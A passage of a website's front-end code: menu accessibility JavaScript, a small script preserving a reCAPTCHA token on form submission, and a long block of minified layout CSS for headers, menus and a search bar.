parentLink.length; ++i ) { parentLink[i].addEventListener( 'touchstart', touchStartFn, false ); } } } function initMenuContainer(container) { var menu = container.getElementsByTagName( 'ul' )[0]; // Some "menu bars" have no child items, in that case just exit if (menu == null) { return; } menu.setAttribute( 'aria-expanded', 'false' ); if ( -1 === menu.className.indexOf( 'nav-menu' ) ) { menu.className += ' nav-menu'; } // Get all the link elements within the menu. links = menu.getElementsByTagName( 'a' ); // Each time a menu link is focused or blurred, toggle focus. for ( i = 0, len = links.length; i < len; i++ ) { links[i].addEventListener( 'focus', toggleFocus, true ); links[i].addEventListener( 'blur', toggleFocus, true ); } toggleFocusClassOnTablet(container); } var menuBars = document.getElementsByClassName( 'rocket-menu-bar' ); for (var i = 0; i < menuBars.length; i++) { var menuBar = menuBars.item(i); initMenuContainer(menuBar); } })(); </script> <script> (function() { function onWindowSubmit2(e) { var form = e.target; if (form.id.startsWith("gform")) { if (form.dataset.recaptchaToken != null) { // Restore saved off recaptcha token var newInput = document.createElement('input'); newInput.type = 'hidden'; newInput.name = 'recaptcha_token'; newInput.value = form.dataset.recaptchaToken; form.appendChild(newInput); } } } // This one catches jQuery and DOM submit jazelReady(function() { jQuery(window).on('submit', function(e) { onWindowSubmit2(e); }); }); })(); </script> <script> document.body.classList.add("atf-loading");</script> <noscript id="deferred-styles"><style> @media screen and (max-width:600px){div#wpadminbar{position:fixed}}</style><style amp-custom="">.rocket_bars_wrapper{position:relative}.rocket_bars_wrapper{padding-top:calc(50px);padding-bottom:calc(40px)}.rocket_bars_wrapper.search-bar{padding-top:calc(50px + 50px)}@media (min-width:768px){.rocket_bars_wrapper{padding-top:calc(50px);padding-bottom:calc(40px)}.rocket_bars_wrapper.search-bar{padding-top:calc(50px + 50px)}}@media (min-width:783px){.rocket_bars_wrapper{padding-top:calc(50px);padding-bottom:calc(40px)}.rocket_bars_wrapper.search-bar{padding-top:calc(50px + 50px)}}@media (min-width:1024px){.rocket_bars_wrapper{padding-top:calc((25px + 75px + 50px));padding-bottom:calc(0px)}.rocket_bars_wrapper.search-bar{padding-top:calc((25px + 75px + 50px))}}@media (min-width:1250px){.rocket_bars_wrapper{padding-top:calc((25px + 75px + 50px));padding-bottom:calc(0px)}.rocket_bars_wrapper.search-bar{padding-top:calc((25px + 75px + 50px))}}.rocket-contain img,.rocket-contain video,.rocket-contain-self{object-fit:contain;object-position:center center}.rocket-cover img,.rocket-cover video,.rocket-cover-self{object-fit:cover;object-position:center center}.rocket-contain img,.rocket-contain video,.rocket-contain-self{font-family:'object-fit:contain;object-position:center center;'!important}.rocket-cover img,.rocket-cover video,.rocket-cover-self{font-family:'object-fit:cover;object-position:center center;'!important}.atf-loading .hide-atf{position:relative;visibility:hidden}.cETcYM{max-height:100%;height:100%}.iBzoRC{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;position:relative;height:100%}.jhjAAu{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:120px;-webkit-align-self:center;-ms-flex-item-align:center;align-self:center;margin:0 .5em;position:relative;height:100%}.fyBDJh{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:undefinedpx;-webkit-align-self:center;-ms-flex-item-align:center;align-self:center;margin:0 .5em;position:relative;height:100%}.blgozf{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:100%;position:relative;height:100%}.ckiPbG{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:100%;height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;padding:0 .5em}.fNrxUM{width:100%;height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;padding:0 .5em}.fNrxUM.fNrxUM{color:inherit;outline:0}.ewREaR{width:100%;height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;padding:0 0}.ewREaR.ewREaR{color:inherit;outline:0}.gtrSpm{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;text-align:center}.guQXYb{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;text-align:center;font-size:22px;font-weight:700}.coYJYV{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;text-align:justify;font-size:12px}.dLLOIG{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bmTxNh{white-space:nowrap;font-size:12px;font-weight:400;text-transform:uppercase;padding:0 8px}.hkRiam{width:100%;height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center}.hkRiam:focus{outline:0}.hkRiam.focus,.hkRiam.hover{color:inherit;background-color:inherit}.main-navigation .hkRiam:hover>div{border-bottom:px solid #011238!important}.main-navigation .hkRiam>div{border-bottom:undefinedpx solid transparent!important}.ggAvII{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:100%;height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;margin:0;padding:0;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap}.IcXvH{position:relative;height:100%}.fCCbMB{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:100%;font-size:12px;padding:2px 8px}.jWSruU{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;font-size:14px}@media (min-width:768px){.jWSruU{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row}}.hKWpVt{padding:2px 8px}.hKWpVt.hKWpVt{-webkit-text-decoration:underline;text-decoration:underline;color:#fff}.jHczye{padding:2px 8px;margin-right:24px}.eVzmeu{font-weight:700}@media (min-width:1024px){.eVzmeu{display:inline}}.kTUHIm{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;font-size:14px}@media (min-width:768px){.kTUHIm{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row}}.jMWqco{display:block;padding:2px 8px;margin-right:24px}.jMWqco:hover{-webkit-text-decoration:underline;text-decoration:underline}.cOzjXX{display:block;padding:2px 8px;margin-right:24px}.cOzjXX:hover{-webkit-text-decoration:underline;text-decoration:underline}.cOzjXX.cOzjXX{-webkit-text-decoration:underline;text-decoration:underline;color:#fff}.fSOlMl{font-weight:700}.hNsfWn{overflow:hidden;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1}.jmTZTf{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:start;-webkit-justify-content:flex-start;-ms-flex-pack:start;justify-content:flex-start}.bCTEKn{width:100%;display:block}@media (min-width:768px){.bCTEKn{display:block}}@media (min-width:783px){.bCTEKn{display:block}}@media (min-width:1024px){.bCTEKn{display:block}}@media (min-width:1250px){.bCTEKn{display:block}}.bCTEKn a,.bCTEKn a:active,.bCTEKn a:focus,.bCTEKn a:visited{-webkit-text-decoration:inherit;text-decoration:inherit;color:inherit}.gyOKSt{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;width:100%;margin:auto;color:#fff;background-color:#bfbfc6}.BmyUS{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;height:100%;width:100%;max-width:1272px;margin:auto}.fpzXwg{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;width:100%;margin:auto;color:#fff;background-color:#011238;padding:20px 0 0}.kzevSo{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:100%;height:210px;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;font-size:14px}@media (min-width:768px){.kzevSo{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;height:118px}}.cbdynj{-webkit-flex:1;-ms-flex:1;flex:1;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center}.imtxfp{-webkit-flex:1;-ms-flex:1;flex:1;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center}@media (min-width:768px){.imtxfp{-webkit-box-pack:start;-webkit-justify-content:flex-start;-ms-flex-pack:start;justify-content:flex-start}}.epJrfl{-webkit-flex:1;-ms-flex:1;flex:1;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center}@media (min-width:768px){.epJrfl{-webkit-box-pack:end;-webkit-justify-content:flex-end;-ms-flex-pack:end;justify-content:flex-end}}</style><style amp-custom="">.rocket_bars_wrapper{position:relative}.rocket_bars_wrapper{padding-top:calc(50px);padding-bottom:calc(40px)}.rocket_bars_wrapper.search-bar{padding-top:calc(50px + 50px)}@media (min-width:768px){.rocket_bars_wrapper{padding-top:calc(50px);padding-bottom:calc(40px)}.rocket_bars_wrapper.search-bar{padding-top:calc(50px + 50px)}}@media (min-width:783px){.rocket_bars_wrapper{padding-top:calc(50px);padding-bottom:calc(40px)}.rocket_bars_wrapper.search-bar{padding-top:calc(50px + 50px)}}@media (min-width:1024px){.rocket_bars_wrapper{padding-top:calc((25px + 75px + 50px));padding-bottom:calc(0px)}.rocket_bars_wrapper.search-bar{padding-top:calc((25px + 75px + 50px))}}@media (min-width:1250px){.rocket_bars_wrapper{padding-top:calc((25px + 75px + 50px));padding-bottom:calc(0px)}.rocket_bars_wrapper.search-bar{padding-top:calc((25px + 75px + 50px))}}.rocket-contain img,.rocket-contain video,.rocket-contain-self{object-fit:contain;object-position:center center}.rocket-cover img,.rocket-cover video,.rocket-cover-self{object-fit:cover;object-position:center center}.rocket-contain img,.rocket-contain video,.rocket-contain-self{font-family:'object-fit:contain;object-position:center center;'!important}.rocket-cover img,.rocket-cover video,.rocket-cover-self{font-family:'object-fit:cover;object-position:center center;'!important}.atf-loading .hide-atf{position:relative;visibility:hidden}.cETcYM{max-height:100%;height:100%}.hKLAcX{position:fixed;background-color:transparent;top:0;right:0;width:100%;z-index:950;-webkit-transition:right .4s ease-in-out;transition:right .4s ease-in-out;box-shadow:0 2px 5px 0 rgba(0,0,0,.1)}.siderail_open .hKLAcX{right:320px}.jsRDRB{position:fixed;background-color:transparent;top:0;right:0;width:100%;z-index:900;-webkit-transition:right .4s ease-in-out;transition:right .4s ease-in-out}.siderail_open .jsRDRB{right:320px}.dYiuYL{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out}.iBzoRC{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;position:relative;height:100%}.kQUstK{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:90px;-webkit-align-self:center;-ms-flex-item-align:center;align-self:center;margin:0 .5em;position:relative;height:100%;background-color:rgba(0,0,0,0);margin-bottom:0;height:calc(100% + 0px);z-index:1}.sticky-top .kQUstK{width:60px}.sticky-top .kQUstK{margin-bottom:0;height:calc(100% + 0px)}.bcmlAL{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:235px;-webkit-align-self:center;-ms-flex-item-align:center;align-self:center;margin:0 .5em;position:relative;height:100%}.sticky-top .bcmlAL{width:155px}.bCwyST{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:100%;height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;padding:0 0}.kcrZik{width:100%;height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;padding:0 6px}.kcrZik.kcrZik{color:inherit;outline:0}.kcrZik:hover{-webkit-text-decoration:underline;text-decoration:underline}.kcrZik:hover{color:#fff}.fNrxUM{width:100%;height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;padding:0 .5em}.fNrxUM.fNrxUM{color:inherit;outline:0}.ewREaR{width:100%;height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;padding:0 0}.ewREaR.ewREaR{color:inherit;outline:0}.gGrDQo{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;text-align:center;padding:0 6px;line-height:normal}.bhZWVx{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;text-align:center;text-transform:uppercase;font-weight:700}.ihHzTK{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;text-align:center;font-size:18px;text-transform:uppercase;font-weight:400}.gYKnlV{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;text-align:center;font-size:12px;text-transform:uppercase;font-style:italic;text-align:center}.dLLOIG{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center}.dXfVbp{width:40.8px;height:24px;margin:4.800000000000001px;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);-webkit-transform-origin:left top;-ms-transform-origin:left top;transform-origin:left top;cursor:pointer;outline:0}.dXfVbp,.dXfVbp *{box-sizing:border-box}.ciHSzG{position:relative;width:100%;height:100%}.vKYFT{display:block;position:absolute;height:2.4000000000000004px;border-radius:2.4000000000000004px;width:100%;background-color:#000;opacity:1;right:0;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);-webkit-transition:.25s ease-in-out;transition:.25s ease-in-out;-webkit-transform-origin:right center;-ms-transform-origin:right center;transform-origin:right center;top:calc(24px/6)}.pressed~.vKYFT{-webkit-transform:rotate(-45deg);-ms-transform:rotate(-45deg);transform:rotate(-45deg);width:33.941125496954285px;top:0;right:2.4000000000000004px}.enQHra{display:block;position:absolute;height:2.4000000000000004px;border-radius:2.4000000000000004px;width:100%;background-color:#000;opacity:1;right:0;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);-webkit-transition:.25s ease-in-out;transition:.25s ease-in-out;-webkit-transform-origin:right center;-ms-transform-origin:right center;transform-origin:right center;top:12px}.pressed~.enQHra{width:0%;opacity:0}.gljXzW{display:block;position:absolute;height:2.4000000000000004px;border-radius:2.4000000000000004px;width:100%;background-color:#000;opacity:1;right:0;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);-webkit-transition:.25s ease-in-out;transition:.25s ease-in-out;-webkit-transform-origin:right center;-ms-transform-origin:right center;transform-origin:right center;top:calc(24px*5/6)}.pressed~.gljXzW{-webkit-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg);width:33.941125496954285px;top:24px;right:2.4000000000000004px}.iShdGc{width:40px;height:40px;margin:8px;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);-webkit-transform-origin:left top;-ms-transform-origin:left top;transform-origin:left top;cursor:pointer;outline:0}.iShdGc,.iShdGc *{box-sizing:border-box}.iXbImb{position:relative;width:100%;height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center}.jFfcVg{height:40px;-webkit-transition:.25s ease-in-out;transition:.25s ease-in-out;opacity:1}.pressed~.jFfcVg{opacity:0}.jHYgqG{display:block;position:absolute;height:2px;border-radius:2px;width:85%;background-color:#000;opacity:1;right:0;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);-webkit-transition:.25s ease-in-out;transition:.25s ease-in-out;-webkit-transform-origin:center center;-ms-transform-origin:center center;transform-origin:center center;opacity:0;-webkit-transform:rotate(-45deg);-ms-transform:rotate(-45deg);transform:rotate(-45deg)}.pressed~.jHYgqG{opacity:1}.klovN{display:block;position:absolute;height:2px;border-radius:2px;width:85%;background-color:#000;opacity:1;right:0;-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);-webkit-transition:.25s ease-in-out;transition:.25s ease-in-out;-webkit-transform-origin:center center;-ms-transform-origin:center center;transform-origin:center center;opacity:0;-webkit-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg)}.pressed~.klovN{opacity:1}.byBKp{position:absolute;right:0;top:-5px}.byBKp.type-none{display:none}.byBKp.type-notifications{color:#00cb4e}.byBKp.type-favorites{color:#fef131}.byBKp.type-filters{color:#4192f7}.CBVH{position:absolute;right:-10px;top:-10px}.CBVH.type-none{display:none}.CBVH.type-notifications{color:#00cb4e}.CBVH.type-favorites{color:#fef131}.CBVH.type-filters{color:#4192f7}.ivnIst.ivnIst{display:inline-block;height:20px;width:20px;font-size:20px;color:#fef131}.cNICw.cNICw{display:inline-block;height:20px;width:20px;font-size:20px;color:#00cb4e}.hvVvzq.hvVvzq{display:inline-block;height:6px;width:6px;font-size:6px}.kORqiw.kORqiw{display:inline-block;height:32px;width:32px;font-size:32px;color:#fff}.hebmLA.hebmLA{display:inline-block;height:20px;width:20px;font-size:20px;color:#999}.loFpun.loFpun{display:inline-block;height:20px;width:20px;font-size:20px;color:#666}.jZagIT{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:48px;height:100%;position:relative;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;outline:0;cursor:pointer;margin-left:10px;margin-right:-10px;width:100%;height:100%}.fpvGHZ{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:48px;height:100%;position:relative;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;outline:0;cursor:pointer;width:100%;height:100%}.iVZfZX{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center}.cZKdEb{position:relative;padding:6px}.eYoIVe{white-space:nowrap;font-size:16px;font-weight:300;text-transform:uppercase}@media (min-width:1250px){.eYoIVe{font-size:16px}}.kaCcHN{white-space:nowrap;font-size:16px;font-weight:300}@media (min-width:1250px){.kaCcHN{font-size:16px}}.fMRSaM{width:100%;height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center}.fMRSaM:focus{outline:0}.fMRSaM.focus,.fMRSaM.hover{color:inherit;background-color:inherit}.iEPPJp{width:100%;height:100%;display:block;padding:10px 20px}.iEPPJp:focus{outline:0}.iEPPJp.focus,.iEPPJp.hover{color:inherit;background-color:inherit}.lgshOj{color:#fff;background-color:#011238;position:absolute;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;top:100%;min-width:100%;left:-999em}.lgshOj svg{fill:#fff}.menu-item-has-children.focus>.lgshOj,.menu-item-has-children.hover>.lgshOj{left:0}.gNalhz{color:#fff;background-color:#011238;position:absolute;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;top:100%;min-width:100%;left:-999em}.gNalhz svg{fill:#fff}.menu-item-has-children.focus>.gNalhz,.menu-item-has-children.hover>.gNalhz{left:auto;right:0}.jIEeni{color:#fff;background-color:#011238;position:absolute;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;top:0;left:-999em}.jIEeni svg{fill:#fff}.menu-item-has-children.focus>.jIEeni,.menu-item-has-children.hover>.jIEeni{left:100%}.hRgzBD{position:relative;min-width:200px}.hRgzBD.focus,.hRgzBD.hover{color:#011238;background-color:#fff}.hRgzBD.focus svg,.hRgzBD.hover svg{fill:#011238}.fqQIYr{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:100%;height:100%;-webkit-align-self:center;-ms-flex-item-align:center;align-self:center;color:#fff;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;margin:0;padding:0}.fqQIYr svg{fill:#fff}.fnTrKJ{position:relative;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;height:100%}.fnTrKJ.focus,.fnTrKJ.hover{color:#fff;background-color:#011238}.fnTrKJ.focus svg,.fnTrKJ.hover svg{fill:#fff}.cTBZKL{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding:0;outline:0;cursor:pointer}.bOFJPm{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding:0 2em;outline:0;cursor:pointer}.lhlhHJ{text-transform:uppercase;-webkit-text-decoration:underline;text-decoration:underline}.sc-hkbPbT.hover .lhlhHJ,.sc-hkbPbT:hover .lhlhHJ{-webkit-text-decoration:underline;text-decoration:underline}.sc-hkbPbT.hover .lhlhHJ,.sc-hkbPbT:hover .lhlhHJ{color:#fff}.kbeoZe{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;height:100%}.kxVeRj{width:310px;height:100%;position:relative}.llBlWg{height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:end;-webkit-justify-content:flex-end;-ms-flex-pack:end;justify-content:flex-end}.fQohMY{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;height:100%;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding-left:1em;padding-right:1em;outline:0;cursor:pointer}.fQohMY .ringing-bell{-webkit-animation:iHKaZr 4s .7s ease-in-out infinite;animation:iHKaZr 4s .7s ease-in-out infinite;-webkit-transform-origin:50% 4px;-ms-transform-origin:50% 4px;transform-origin:50% 4px}.ePzbUR{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;width:100%;position:relative;height:100%}.cpuTFS{position:absolute;width:100%;max-width:100%;height:100%;right:0;top:0;-webkit-transition:width .4s ease-in-out,background-color .4s ease-in-out;transition:width .4s ease-in-out,background-color .4s ease-in-out;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center}.cpuTFS.expanded{width:100vw}.gZQuSJ{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;height:100%;padding:0 .5em;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;cursor:pointer;outline:0;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex}.collapsed .gZQuSJ{-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1}.gZQuSJ svg{fill:#000}.gZQuSJ:hover svg{fill:#4192f7}.iYFWlJ{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bHmKEV{position:relative;padding:6px}.expanded .bHmKEV{display:none}.guuAai{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;height:100%;padding:0 .5em;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1}.collapsed .guuAai{display:none}.exoXFF{position:relative;width:100%}.jyZdVf{width:100%;height:40px;text-align:center;margin:0}.jyZdVf.jyZdVf{outline:0;border:none;padding:2px 8px;border-bottom:1px solid grey;border-bottom-width:0;border-radius:0}.jyZdVf::-webkit-input-placeholder{font-style:italic;color:#b5b5b5}.jyZdVf::-moz-placeholder{font-style:italic;color:#b5b5b5}.jyZdVf:-ms-input-placeholder{font-style:italic;color:#b5b5b5}.jyZdVf:-moz-placeholder{font-style:italic;color:#b5b5b5}.jyZdVf::-webkit-search-cancel-button{display:none}.jyZdVf::-ms-clear{display:none}.kuFcw{position:absolute;top:50%;right:8px;-webkit-transform:translateY(-50%);-ms-transform:translateY(-50%);transform:translateY(-50%);cursor:pointer;height:24px;outline:0}.ghJdpo{position:absolute;top:0;right:0}.iUPnKw{-webkit-transition:height .4s ease-in-out,width .4s ease-in-out;transition:height .4s ease-in-out,width .4s ease-in-out;height:100%;padding:0 .5em;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;cursor:pointer;outline:0}.collapsed 